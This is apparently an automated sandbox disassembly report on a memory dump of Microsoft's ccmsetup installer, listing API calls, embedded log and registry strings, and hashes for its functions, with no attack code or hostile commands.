                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Access to registry key '%s' failed with error (0x%08x).$Access to registry value '%s' in key '%s' failed with error (0x%08x).$CcmSetup::CheckPrereqInstalledKey$Software\Microsoft\CCMSetup\Prerequisites$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$hrRes$hrRes
                                                                                          • API String ID: 2170986407-4066963761
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00640361
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006403B7
                                                                                            • Part of subcall function 005F4E46: __EH_prolog3_catch.LIBCMT ref: 005F4E4D
                                                                                            • Part of subcall function 005F4E46: GetCurrentThreadId.KERNEL32 ref: 005F4EB2
                                                                                            • Part of subcall function 005F4E46: __CxxThrowException@8.LIBCMT ref: 005F4F8F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00640449
                                                                                          • IsTextUnicode.ADVAPI32(00000002,?,00000000), ref: 00640472
                                                                                          Strings
                                                                                          • CCM::LocationServices::GetDwordFromColumn, xrefs: 00640374
                                                                                          • ..\lsad.cpp, xrefs: 00640451
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00640444
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006403B2
                                                                                          • GetDwordFromColumn received unexpected column type, xrefs: 00640412
                                                                                          • pCol, xrefs: 006403AD
                                                                                          • mSSMSMPName, xrefs: 006404C6
                                                                                          • ..\lsad.cpp, xrefs: 006403A7
                                                                                          • ..\lsad.cpp, xrefs: 00640439
                                                                                          • AD query returned ADSTYPE_PROV_SPECIFIC for a DWORD type. Value is %s, xrefs: 006404C7
                                                                                          • ..\lsad.cpp, xrefs: 006403BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3_catchH_prolog3_catch_TextThrowUnicode
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$AD query returned ADSTYPE_PROV_SPECIFIC for a DWORD type. Value is %s$CCM::LocationServices::GetDwordFromColumn$GetDwordFromColumn received unexpected column type$mSSMSMPName$pCol
                                                                                          • API String ID: 3700165810-47218295
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0058600E
                                                                                            • Part of subcall function 0059D6C5: __EH_prolog3_catch_GS.LIBCMT ref: 0059D6CC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058606A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005860E9
                                                                                          Strings
                                                                                          • OSD::Utility::SetupAPIUtil::ExtractFileFromCAB( sCabFile.c_str(), c_szCcmsetupManifestFileName, sManifestFile.c_str() ), xrefs: 005860DF
                                                                                          • ccmsetup.xml, xrefs: 005860B3
                                                                                          • CcmSetup::ExtractManifestCAB, xrefs: 00586019
                                                                                          • ccmsetup.cpp, xrefs: 005860F1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005860E4
                                                                                          • Successfully extracted manifest file %s from file %s., xrefs: 0058616B
                                                                                          • ValidateFileSignature( sCabFile ), xrefs: 00586060
                                                                                          • Failed extract manifest file from cab file '%s'. Error 0x%x. File may be corrupt., xrefs: 0058611B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586065
                                                                                          • ccmsetup.cpp, xrefs: 00586072
                                                                                          • ccmsetup.cpp, xrefs: 0058605A
                                                                                          • ccmsetup.cpp, xrefs: 005860D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::ExtractManifestCAB$Failed extract manifest file from cab file '%s'. Error 0x%x. File may be corrupt.$OSD::Utility::SetupAPIUtil::ExtractFileFromCAB( sCabFile.c_str(), c_szCcmsetupManifestFileName, sManifestFile.c_str() )$Successfully extracted manifest file %s from file %s.$ValidateFileSignature( sCabFile )$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.xml
                                                                                          • API String ID: 3531467662-1084108064
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005BB0E1
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB171
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB27A
                                                                                          Strings
                                                                                          • util.cpp, xrefs: 005BB26A
                                                                                          • util.cpp, xrefs: 005BB282
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005BB16C
                                                                                          • regKey.SetMultiString(c_szRegValue_InstalledLangs, sToWrite), xrefs: 005BB270
                                                                                          • SetInstalledLanguages, xrefs: 005BB10F
                                                                                          • Software\Microsoft\CCMSetup, xrefs: 005BB134
                                                                                          • util.cpp, xrefs: 005BB161
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005BB275
                                                                                          • InstalledLangs, xrefs: 005BB23E
                                                                                          • regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess ), xrefs: 005BB167
                                                                                          • util.cpp, xrefs: 005BB179
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CloseH_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$InstalledLangs$SetInstalledLanguages$Software\Microsoft\CCMSetup$regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess )$regKey.SetMultiString(c_szRegValue_InstalledLangs, sToWrite)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 2387487575-1854072094
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B6320
                                                                                            • Part of subcall function 00601361: CoTaskMemFree.OLE32(?,?,00600C22,00000000,0063DDEA,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 0060136F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B63BC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6426
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeH_prolog3_catchTask
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$BG error context is %d$GetBITSJobError$d(m$spCopyError->GetError(&bgContext, &hrError)$spCopyJob->GetError(&spCopyError)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 2630231384-1159171810
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006733D4
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                            • Part of subcall function 00673557: __EH_prolog3_catch_GS.LIBCMT ref: 0067355E
                                                                                            • Part of subcall function 00673557: GetCurrentThreadId.KERNEL32 ref: 006735C2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00673464
                                                                                          • SysFreeString.OLEAUT32(?), ref: 0067349D
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006734A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006734E8
                                                                                          Strings
                                                                                          • ..\CheckAccess.cpp, xrefs: 006734D8
                                                                                          • ..\CheckAccess.cpp, xrefs: 00673454
                                                                                          • spSite->GetSslCtlInfo(&bsSslCtlIdentifier, &bsSslCtlStoreName, &dwCertCheckMode), xrefs: 006734DE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006734E3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067345F
                                                                                          • GetMPWebSite(spSite), xrefs: 0067345A
                                                                                          • ..\CheckAccess.cpp, xrefs: 0067346C
                                                                                          • ..\CheckAccess.cpp, xrefs: 006734F0
                                                                                          • CCM::Utility::Security::GetIISSCertCheckMode, xrefs: 00673413
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeString$H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CheckAccess.cpp$..\CheckAccess.cpp$..\CheckAccess.cpp$..\CheckAccess.cpp$CCM::Utility::Security::GetIISSCertCheckMode$GetMPWebSite(spSite)$spSite->GetSslCtlInfo(&bsSslCtlIdentifier, &bsSslCtlStoreName, &dwCertCheckMode)
                                                                                          • API String ID: 4028414696-4290402953
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005BB2E4
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB35D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB3C2
                                                                                          Strings
                                                                                          • util.cpp, xrefs: 005BB3CA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005BB358
                                                                                          • util.cpp, xrefs: 005BB365
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess), xrefs: 005BB353
                                                                                          • regKey.SetDword(c_szRegValue_Installing, bInstalling ? 1 : 0), xrefs: 005BB3B8
                                                                                          • SetInstallingFlag, xrefs: 005BB300
                                                                                          • Software\Microsoft\CCMSetup, xrefs: 005BB326
                                                                                          • util.cpp, xrefs: 005BB34D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005BB3BD
                                                                                          • util.cpp, xrefs: 005BB3B2
                                                                                          • CcmInstallingProduct, xrefs: 005BB390
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmInstallingProduct$SetInstallingFlag$Software\Microsoft\CCMSetup$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess)$regKey.SetDword(c_szRegValue_Installing, bInstalling ? 1 : 0)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1757837785-1686365800
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AC3FF
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AC62D
                                                                                            • Part of subcall function 005AB8A2: __EH_prolog3_catch_GS.LIBCMT ref: 005AB8AC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AC55F
                                                                                          Strings
                                                                                          • msiutil.cpp, xrefs: 005AC635
                                                                                          • GetCurrentClientProductCode, xrefs: 005AC448
                                                                                          • msiutil.cpp, xrefs: 005AC54F
                                                                                          • Product version for product '%s' does not exist. Treat as not installed., xrefs: 005AC510
                                                                                          • {252DA259-82CA-4177-B8D0-49C78937BA3E}, xrefs: 005AC48C
                                                                                          • msiutil.cpp, xrefs: 005AC61D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AC628
                                                                                          • msiutil.cpp, xrefs: 005AC56B
                                                                                          • uMaxVersion > 0, xrefs: 005AC623
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AC55A
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_Thread$H_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$GetCurrentClientProductCode$Product version for product '%s' does not exist. Treat as not installed.$msiutil.cpp$msiutil.cpp$msiutil.cpp$msiutil.cpp$uMaxVersion > 0${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 1234445865-4009815606
                                                                                          • Opcode ID: 415ae3f3b246a006cc67a5d351c2b320441670084f81c74e43c696e1709b8307
                                                                                          • Instruction ID: 22b10fa28fa3764b84ce94e1447c86763c5519306dd3d973d288a30ff07b06d3
                                                                                          • Opcode Fuzzy Hash: 415ae3f3b246a006cc67a5d351c2b320441670084f81c74e43c696e1709b8307
                                                                                          • Instruction Fuzzy Hash: 05618171D00359EADF20DBA4CD49FEDBEB9BB56300F14419AB109A7282DB705E84CF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062C34A
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C3A4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C459
                                                                                          Strings
                                                                                          • ..\CcmWebProxyUtilLib.cpp, xrefs: 0062C3AC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C39F
                                                                                          • CcmUtilLib::CcmSetProxyInfoToBITSJob, xrefs: 0062C35F
                                                                                          • Failed to set proxy to bits job. Error 0x%x, xrefs: 0062C4C6
                                                                                          • pJob, xrefs: 0062C39A
                                                                                          • ..\CcmWebProxyUtilLib.cpp, xrefs: 0062C461
                                                                                          • SetProxyInfoToBITSJob( CCM_PROXY_TYPE_DETECT, 0, BString(sProxyList.c_str()), BString(sBypassList.c_str()), bsEmpty, bsEmpty, pJob, xrefs: 0062C44F
                                                                                          • ..\CcmWebProxyUtilLib.cpp, xrefs: 0062C449
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C454
                                                                                          • ..\CcmWebProxyUtilLib.cpp, xrefs: 0062C394
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmWebProxyUtilLib.cpp$..\CcmWebProxyUtilLib.cpp$..\CcmWebProxyUtilLib.cpp$..\CcmWebProxyUtilLib.cpp$CcmUtilLib::CcmSetProxyInfoToBITSJob$Failed to set proxy to bits job. Error 0x%x$SetProxyInfoToBITSJob( CCM_PROXY_TYPE_DETECT, 0, BString(sProxyList.c_str()), BString(sBypassList.c_str()), bsEmpty, bsEmpty, pJob$pJob
                                                                                          • API String ID: 981364226-529220274
                                                                                          • Opcode ID: 3f136dbeaf5deb05f7b2e3a6a05761f5b23461b5327730a11dacae55d3486bed
                                                                                          • Instruction ID: 7454e851704f06e82790e446646fd2831edb62fcf6ad060389043a1d2ed5fc47
                                                                                          • Opcode Fuzzy Hash: 3f136dbeaf5deb05f7b2e3a6a05761f5b23461b5327730a11dacae55d3486bed
                                                                                          • Instruction Fuzzy Hash: DE411771941658EADB01EBA4D91ABEF7FB6AF52324F148059F4016B3C2C7745F08CBA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0062A152
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A1BB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A293
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$CcmUtilLib::CcmAppendDPAuthTokenToHeaders$SCCM-DPAuth-Token: $ppszNewHeaders$sHeaders.CoAllocString(ppszNewHeaders)
                                                                                          • API String ID: 3353525418-559953918
                                                                                          • Opcode ID: 249f6ae64c26a3ac658cf9148f48abfb692751a4ee1035057948a280fee0ed34
                                                                                          • Instruction ID: 0e3f1a5e65d4ca3edac8ea4c1921b49923bdc2271e8acabf52583817b6c044e3
                                                                                          • Opcode Fuzzy Hash: 249f6ae64c26a3ac658cf9148f48abfb692751a4ee1035057948a280fee0ed34
                                                                                          • Instruction Fuzzy Hash: AD41D371941259EBCF14EFA4E94AAEE7E36AF51710F18811AF611773C1DBB81A04CB22
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Current$ErrorH_prolog3_catchLastOpenRevertSelfToken
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::CImpersonator::ImpersonateProcess$CImpersonator::ImpersonateProcess failed with error 0x%x$HRESULT_FROM_WIN32(GetLastError())$X:\bt\1024777\repo\src\common\inc\ccmutil.h$m_bImpersonated == false
                                                                                          • API String ID: 1740939202-2862243018
                                                                                          • Opcode ID: 6e6ca9e3b6e4e2d7cae81a1aff671bfdd918c35551c26e16ec66231c315beb56
                                                                                          • Instruction ID: 151a1626ca3c13de6a1d113cc8d97aadee41f3cf99fad5b584d45305b656cd1f
                                                                                          • Opcode Fuzzy Hash: 6e6ca9e3b6e4e2d7cae81a1aff671bfdd918c35551c26e16ec66231c315beb56
                                                                                          • Instruction Fuzzy Hash: 43312F71A813D6AADB24ABF64D0EBAE7D557F92710F044105FAC0AB2C1C7758642D3A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0060D021
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060D084
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060D117
                                                                                          Strings
                                                                                          • pvDateTime != 0, xrefs: 0060D07A
                                                                                          • ..\WmiObject.cpp, xrefs: 0060D107
                                                                                          • %04u%02u%02u%02u%02u%02u.%03u000+000, xrefs: 0060D0D4
                                                                                          • ..\WmiObject.cpp, xrefs: 0060D120
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060D112
                                                                                          • StringCchPrintfW( szWmiTime, (sizeof(szWmiTime)/sizeof(szWmiTime[0])), L"%04u%02u%02u%02u%02u%02u.%03u000+000", SystemTime.wYear, , xrefs: 0060D10D
                                                                                          • ..\WmiObject.cpp, xrefs: 0060D08D
                                                                                          • ..\WmiObject.cpp, xrefs: 0060D074
                                                                                          • CCM::Utility::Wmi::SystemTimeToWmiTime, xrefs: 0060D03F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060D07F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %04u%02u%02u%02u%02u%02u.%03u000+000$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::SystemTimeToWmiTime$StringCchPrintfW( szWmiTime, (sizeof(szWmiTime)/sizeof(szWmiTime[0])), L"%04u%02u%02u%02u%02u%02u.%03u000+000", SystemTime.wYear, $pvDateTime != 0
                                                                                          • API String ID: 3353525418-1479723257
                                                                                          • Opcode ID: b4910682ce1f870dd2bdce3dc93ca500a821ebe03c76c69fd05c2831f0c88446
                                                                                          • Instruction ID: 155bf15f58e5da2c7ba99891a5f05104bbb9fcf7a9249571970b89b57af22a6d
                                                                                          • Opcode Fuzzy Hash: b4910682ce1f870dd2bdce3dc93ca500a821ebe03c76c69fd05c2831f0c88446
                                                                                          • Instruction Fuzzy Hash: BB3119B1980355F9DB20DBA48C06FFEBBB5AF14711F044185F948A72C1D7B85E45CB62
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060D1A4
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060D205
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060D27D
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0060D2EA
                                                                                          Strings
                                                                                          • ..\ServiceControl.cpp, xrefs: 0060D26D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060D278
                                                                                          • Open(dwDesiredAccess, pszMachineName, pszServiceDBName), xrefs: 0060D273
                                                                                          • ..\ServiceControl.cpp, xrefs: 0060D286
                                                                                          • ..\ServiceControl.cpp, xrefs: 0060D1F5
                                                                                          • ..\ServiceControl.cpp, xrefs: 0060D20E
                                                                                          • pszServiceName != 0, xrefs: 0060D1FB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060D200
                                                                                          • CCM::Utility::CServiceControl::CServiceControl, xrefs: 0060D1C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3H_prolog3_catchThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ServiceControl.cpp$..\ServiceControl.cpp$..\ServiceControl.cpp$..\ServiceControl.cpp$CCM::Utility::CServiceControl::CServiceControl$Open(dwDesiredAccess, pszMachineName, pszServiceDBName)$pszServiceName != 0
                                                                                          • API String ID: 1572326495-1186237415
                                                                                          • Opcode ID: 07b57725211c120707dfd45f28e3365c2b6772b0afe87fae038f7b98c6c4d06b
                                                                                          • Instruction ID: 091831bc7100b810e857a3ec2e22881ebc2aa84be9a2d19e1d7bfc0dc47e7d04
                                                                                          • Opcode Fuzzy Hash: 07b57725211c120707dfd45f28e3365c2b6772b0afe87fae038f7b98c6c4d06b
                                                                                          • Instruction Fuzzy Hash: 653126709C034AEADB10EBE4C90ABEE7E61AF21715F148105FA046B2C2C7F84B05D791
                                                                                          APIs
                                                                                            • Part of subcall function 005F646B: __EH_prolog3_catch_GS.LIBCMT ref: 005F6472
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00594362
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005943CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$($Will install '%s' upon success.$Xi$arrValues.size() > 1$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$sValue.tokenize(c_szOption_Separator, arrValues)
                                                                                          • API String ID: 229633481-3537426159
                                                                                          • Opcode ID: 6ce472e7498f0599777d995845b4a945020b13af4a08a91f14661821489bc8b4
                                                                                          • Instruction ID: cde5d285143baf83222b68204672df65636fcb4d5e7eccd8cc1c2cdc08a19765
                                                                                          • Opcode Fuzzy Hash: 6ce472e7498f0599777d995845b4a945020b13af4a08a91f14661821489bc8b4
                                                                                          • Instruction Fuzzy Hash: FB413B70909259EADF14EFA4CE8DFAD7FB5AB16304F0400D8E509AB282D7715E88CF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0059E0E2
                                                                                          • DefWindowProcW.USER32(?,?,?,?,CcmSetup::WndProc,00000010), ref: 0059E125
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059E164
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059E1A6
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catchProcWindow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::WndProc$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$g_pCcmSetup->OnPowerEvent((DWORD)wp, (LPVOID)lp)$g_pCcmSetup->Stop()
                                                                                          • API String ID: 1183066285-1861140306
                                                                                          • Opcode ID: 57b8a195afbe0a3d623c0b86adabfbd8ee6f4b56d03869e7dcd2f79ee785eda7
                                                                                          • Instruction ID: 2c8d5702298a9499fb84bf49cc703831631a0196a6e42c36e68c32b1878a6f75
                                                                                          • Opcode Fuzzy Hash: 57b8a195afbe0a3d623c0b86adabfbd8ee6f4b56d03869e7dcd2f79ee785eda7
                                                                                          • Instruction Fuzzy Hash: 2721F2713C0306BADF11EB648D6BEAE3E66BF91B40F580005F840EB2C2DBB18941E751
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062904B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062909B
                                                                                          • CertVerifyTimeValidity.CRYPT32(00000000,?), ref: 006290CA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006290FB
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00629096
                                                                                          • ..\CcmCert.cpp, xrefs: 00629103
                                                                                          • CcmUtilLib::IsCertificateCurrent, xrefs: 00629055
                                                                                          • ..\CcmCert.cpp, xrefs: 006290A3
                                                                                          • ..\CcmCert.cpp, xrefs: 0062908B
                                                                                          • ..\CcmCert.cpp, xrefs: 006290EB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006290F6
                                                                                          • 0 == ::CertVerifyTimeValidity( 0, pCertContext->pCertInfo ), xrefs: 006290F1
                                                                                          • 0 != pCertContext, xrefs: 00629091
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertH_prolog3_catchTimeValidityVerify
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != pCertContext$0 == ::CertVerifyTimeValidity( 0, pCertContext->pCertInfo )$CcmUtilLib::IsCertificateCurrent
                                                                                          • API String ID: 2956962226-2901582019
                                                                                          • Opcode ID: 0762227d8b0b40bff5876e8fbdfff45aca0609c0e29cdb1a8e6f255c52fcfc0a
                                                                                          • Instruction ID: e0e1d3ed000f4b906aac8d82eedd1150fca742b432a6a9dbdb7fa32d592eda86
                                                                                          • Opcode Fuzzy Hash: 0762227d8b0b40bff5876e8fbdfff45aca0609c0e29cdb1a8e6f255c52fcfc0a
                                                                                          • Instruction Fuzzy Hash: B4112271A80769B6C711ABA54D1EFEF2D65AF91F20F184015BD446B3C1CBE98900C7A5
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005CB33D
